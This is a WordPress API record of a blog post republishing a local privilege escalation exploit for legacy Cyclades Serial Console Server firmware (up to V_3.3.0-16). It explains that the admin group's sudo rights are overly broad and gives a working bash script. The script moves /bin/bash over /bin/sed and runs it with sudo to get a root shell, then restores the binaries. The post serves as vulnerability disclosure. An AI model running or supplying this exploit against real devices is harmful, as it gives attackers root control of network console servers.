{"id":20917,"date":"2022-02-22T09:31:41","date_gmt":"2022-02-22T06:31:41","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166079\/cyclades330-escalate.txt"},"modified":"2022-02-22T10:13:17","modified_gmt":"2022-02-22T06:43:17","slug":"cyclades-serial-console-server-3-3-0-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cyclades-serial-console-server-3-3-0-privilege-escalation\/","title":{"rendered":"Cyclades Serial Console Server 3.3.0 Privilege Escalation"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Cyclades Serial Console Server 3.3.0 &#8211; Local Privilege Escalation<br \/>\n# Date: 09 Feb 2022<br \/>\n# Exploit Author: @ibby<br \/>\n# Vendor Homepage: https:\/\/www.vertiv.com\/en-us\/<br \/>\n# Software Link: https:\/\/downloads2.vertivco.com\/SerialACS\/ACS\/ACS_v3.3.0-16\/FL0536-017.zip<br \/>\n# Version: Legacy Versions V_1.0.0 to V_3.3.0-16<br \/>\n# Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16)<br \/>\n# CVE : N\/A<\/p>\n<p dir=\"ltr\"># The reason this exists, is the admin user &amp; user group is the default user for these devices. The software ships with overly permissive sudo privileges<br \/>\n## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software &#8211; the last version being from ~2014.<br \/>\n### This vulnerability does not exist in the newer distributions of the ACS Software.<\/p>\n<p dir=\"ltr\">#!\/bin\/bash<\/p>\n<p dir=\"ltr\">## NOTE: To view the vulnerability yourself, uncomment the below code &amp; run as sudo, since it&#8217;s mounting a file system.<br \/>\n## The software is publicly available, this will grab it and unpack the firmware for you.<\/p>\n<p dir=\"ltr\">#TMPDIR=$(mktemp -d)<br \/>\n#curl &#8216;https:\/\/downloads2.vertivco.com\/SerialACS\/ACS\/ACS_v3.3.0-16\/FL0536-017.zip&#8217; -o FL0536-017.zip &amp;&amp; unzip FL0536-017.zip $$ binwalk -e FL0536-017.bin<br \/>\n#sudo mount -o ro,loop _FL0536-017.bin.extracted\/148000 $TMPDIR &amp;&amp; sudo cat &#8220;$TMPDIR\/etc\/sudoers&#8221;<br \/>\n#echo &#8220;As you can see, the sudo permissions on various binaries, like that of \/bin\/mv, are risky.&#8221;<\/p>\n<p dir=\"ltr\"># ! EXPLOIT CODE BELOW ! #<br \/>\n# &#8212;&#8212;-<br \/>\n# Once you exit the root shell, this will clean up and put the binaries back where they belong.<br \/>\necho &#8220;Creating backups of sed &amp; bash binaries&#8221;<br \/>\nsudo cp \/bin\/sed \/bin\/sed.bak<br \/>\nsudo cp \/bin\/bash \/bin\/bash.bak<br \/>\necho &#8220;Saved as bash.bak &amp; sed.bak&#8221;<br \/>\nsudo mv \/bin\/bash \/bin\/sed<br \/>\nsudo \/bin\/sed<br \/>\necho &#8220;Replacing our binary with the proper one&#8221;<br \/>\nsudo mv \/bin\/bash.bak \/bin\/bash &amp;&amp; sudo mv \/bin\/sed.bak \/bin\/sed<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Cyclades Serial Console Server 3.3.0 &#8211; Local Privilege Escalation # Date: 09 Feb 2022 # Exploit Author: @ibby # Vendor Homepage: https:\/\/www.vertiv.com\/en-us\/ # Software Link: https:\/\/downloads2.vertivco.com\/SerialACS\/ACS\/ACS_v3.3.0-16\/FL0536-017.zip # Version: Legacy Versions V_1.0.0 to V_3.3.0-16 # Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16) # CVE : N\/A # The reason this &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-20917","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20917","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=20917"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20917\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=20917"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=20917"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=20917"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}